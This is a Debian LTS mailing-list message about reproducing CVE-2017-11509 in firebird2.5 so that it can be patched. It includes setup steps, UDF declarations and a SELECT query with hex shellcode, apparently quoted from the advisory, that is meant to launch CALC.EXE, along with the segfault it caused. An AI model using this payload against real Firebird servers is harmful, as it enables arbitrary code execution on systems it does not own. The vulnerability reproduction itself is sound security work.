Re: Wheezy update of firebird2.5?
On 2018-04-04 19:54:14, Damyan Ivanov wrote:
> -=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
>> Dear maintainer(s),
>>
>> The Debian LTS team would like to fix the security issues which are
>> currently open in the Wheezy version of firebird2.5:
>> https://security-tracker.debian.org/tracker/source-package/firebird2.5
>>
>> Would you like to take care of this yourself?
>
> Sorry, no.
>
> AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the
> security team advised against updating that for stable, and the issue
> is still open in unstable.
>
> According to the researchers discovering it, upstream refused to fix
> it :( so the only "fix" I am aware of is the change in the default
> config to disable the vulnerable functionality. You can find the patch
> for firebird3.0 at
> https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698
>
> It is perhaps not directly applicable to firebid2.5, but should help
> regardless.
I tried digging into this issue a little further, and couldn't get
far. I always have this hurdle to just setup a test environment with
Firebird, so I figured I would share the procedure here for the future,
so that I wouldn't have to rebuild this from scratch every time.
1. install the database and packages:
apt-get install firebird2.5-examples firebird2.5-dev firebird2.5-superclassic
2. set a admin password and configure the server:
dpkg-reconfigure firebird2.5-superclassic
3. deploy a test database:
gunzip -c /usr/share/doc/firebird2.5-examples/examples/empbuild/employee.fdb.gz > /var/lib/firebird/2.5/data/employee.fdb
chown firebird.firebird /var/lib/firebird/2.5/data/employee.fdb
4. connect to the database, in a `isql-fb` prompt:
SQL> connect "localhost:/var/lib/firebird/2.5/data/employee.fdb" user 'SYSDBA' password 'password';
Then you can do stuff like `SHOW TABLES` and so on. In particular, I
have tried to reproduce the issue and I can confirm I can create two
external functions with the same ENTRY_POINT, although the second
snippet in the advisory has two `DECLARE` statements which I assume is a
typo:
DECLARE EXTERNAL FUNCTION string2blob
VARCHAR(300) BY DESCRIPTOR,
BLOB RETURNS PARAMETER 2
ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'
DECLARE EXTERNAL FUNCTION a6
VARCHAR(300) BY DESCRIPTOR,
VARCHAR(400) BY DESCRIPTOR
RETURNS INTEGER
ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'
The actual query to trigger arbitrary code execution seems to fail,
however:
SQL> select a6((select x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7' from rdb$database), (select x'11111111C8FD8503' from rdb$database)) from rdb$databaseStatement failed, SQLSTATE = 08006
Unable to complete network request to host "localhost".
-Error writing data to the connection.
Considering it was crafted to start `CALC.EXE` in Windows, that might be
expected. We do see a segfault in the logs however:
wheezy Tue Apr 17 16:49:56 2018
The user defined function: A6
referencing entrypoint: string2blob
in module: fbudf
caused the fatal exception: Segmentation Fault.
The code attempted to access memory
without privilege to do so.
This exception will cause the Firebird server
to terminate abnormally.
... which is probably a bad sign.
I don't quite know where to go from here. I was somewhat hoping that
Wheezy would be magically not vulnerable to this issue, but obviously,
there's something wrong here that should probably be fixed.
A.
--
Every time I see an adult on a bicycle I no longer despair for the
future of the human race.
- H. G. Wells
Reply to: